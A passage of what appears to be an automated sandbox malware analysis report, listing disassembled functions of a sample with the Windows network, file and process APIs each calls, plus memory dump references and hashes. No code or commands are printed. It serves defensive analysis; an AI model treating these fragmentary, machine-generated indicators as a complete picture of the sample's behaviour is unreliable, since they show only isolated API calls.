                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E0C2BF2002509FC310CB6ADC4085E772BFBC223032E0518E421D33E0D638E9028AA8
                                                                                                                                                                                                                                                                                            Function 0040BD53 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040BD73
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
                                                                                                                                                                                                                                                                                            • Instruction ID: 7de03404172e5aabe1c443ce8fe071b09326cd08ca7e4df849f82930eaead7d2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BE0467A280301AFEB04DF50CCC0F2AB372FB8A720B14C058EC008B266E734E811AF60
                                                                                                                                                                                                                                                                                            Function 0041EFEF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041F011
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CurrentProfile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2104809126-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
                                                                                                                                                                                                                                                                                            • Instruction ID: 8b1b12d0e7ad679d432470b63cf508538332a85973f9a3fcf61e176a271b0cc5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E0C27A3002058BD324EF28DC90E9BB769AF97340F21842CBD4187351EA32EC088B91
                                                                                                                                                                                                                                                                                            Function 004070A7 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,?), ref: 004070C0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
                                                                                                                                                                                                                                                                                            • Instruction ID: 087524e99e2e36aa6c24c0d744c8560dd19395c8f046e54837bd47bfdc5e2b69
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012B6741111ABEB1CC764CC659BA7A66AF96280B24413CA41797AD0E631A901C651
                                                                                                                                                                                                                                                                                            Function 00406333 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040634C
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
                                                                                                                                                                                                                                                                                            • Instruction ID: e80a74c448b2809dfa2cf42497063a6acbaa13e565d0bdd883d0bc87c2d4b46b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAE08CB6B0020BEFEF08CF04CCD1E65B3BAAB8430472480289405DB399E671ED028B50
                                                                                                                                                                                                                                                                                            Function 00422384 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00422398
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2244384528-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
                                                                                                                                                                                                                                                                                            • Instruction ID: 7bdeb3cd2f91353ee1d3f4ce7728727f60221488556750a91bea947e3788f92e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBD05B753001025FF718CB59CC93F593356A755304F1C4524F602DB6D5E560D8028744
                                                                                                                                                                                                                                                                                            Function 00407913 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040792F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
                                                                                                                                                                                                                                                                                            • Instruction ID: 79d45554b27fa09bf4581156ee703008adca5f77a3fafbdbf00c8d7df8431c84
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E012B6B421569BEB18CB65DC91E9E337AEB56200B05802CA506A7250E930AD51CB90
                                                                                                                                                                                                                                                                                            Function 00404F86 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00404F9F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
                                                                                                                                                                                                                                                                                            • Instruction ID: 2cce16e57b110384986bc3907c8539cc9eec47c1517a23192c1d69bd0d79c129
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6E0C231B241119FD304EB94DC84D0677B6ABD57003048438A401DB358E231AD01CB40
                                                                                                                                                                                                                                                                                            Function 00420268 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(?,?), ref: 0042027D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
                                                                                                                                                                                                                                                                                            • Instruction ID: 472f168c98467f6050b8b6ae28b630018f91697d413617e88336b4e14123bb41
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE017B67002419FDB0CDB58DCA1F6673E1B798200F04087CE916CB3A0FA39DC049B14
                                                                                                                                                                                                                                                                                            Function 00423646 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
                                                                                                                                                                                                                                                                                            • Instruction ID: 9abe59a6ac43a9b84b513fa3df34008672bafd94d198bd606b6e833ccc4e43ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D05B34302111EB8314CF0DDD41D56B3E9AFC6249394856CE105CB346D779DE168B59
                                                                                                                                                                                                                                                                                            Function 00409C5B Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00409C6D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: socket
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b62aeab5212f7cc365a4e332f7e80607400786f412a85baa86ec53f08c962c95
                                                                                                                                                                                                                                                                                            • Instruction ID: e427cbbe3e3b83450029c41dc8cf312ea74f1a6a1087ca7c39bd8c843ca28d30
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b62aeab5212f7cc365a4e332f7e80607400786f412a85baa86ec53f08c962c95
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD05B34380550D7E7249798DCD5F1562036FC0764F6C45296526BF7D1C2A55C514744
                                                                                                                                                                                                                                                                                            Function 0040A448 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00001000,00000000), ref: 0040A45B
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                                                                            • Opcode ID: a0b38797b0c4993cb6cb6c0d406990d8ac3111ba521a743e6bbe61eb680d21bf
                                                                                                                                                                                                                                                                                            • Instruction ID: 533c664c92f654cb3d350bcdb2dc7710a5b11fcccbc60dcf5c58030cdea738a0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0b38797b0c4993cb6cb6c0d406990d8ac3111ba521a743e6bbe61eb680d21bf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED05E30340501E7EB68CB09CC94F2676A2EFC4788F14403CA11A962E5C524EC55CA48
                                                                                                                                                                                                                                                                                            Function 0042351E Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 08c310df711f07a2628d32e9ecedf022eaf25dce794c6d43b118286a36e3db00
                                                                                                                                                                                                                                                                                            • Instruction ID: 30a14a1c631fd8df27b22c6e9e8fd007448dc770daa81c8ea299fb2972b56920
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08c310df711f07a2628d32e9ecedf022eaf25dce794c6d43b118286a36e3db00
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDD0C9B53510059FE748CB1DDCB2FA922D5EB89304F41043CE905C3391EA25EC004A69
                                                                                                                                                                                                                                                                                            Function 00423348 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 297cd095a779b0ab7d3ff9f3e489e58b4ce6eb7f488052a56e857a16a7ddc70b
                                                                                                                                                                                                                                                                                            • Instruction ID: 555c327657a875382b7c372e8fd0c9cb93023587c98246a1df3570523c5c859b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 297cd095a779b0ab7d3ff9f3e489e58b4ce6eb7f488052a56e857a16a7ddc70b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CD012343010459FE798CB2DCCA1F4633D5FB86308F050038B645C7391DA24D9048718
                                                                                                                                                                                                                                                                                            Function 0040B9F7 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
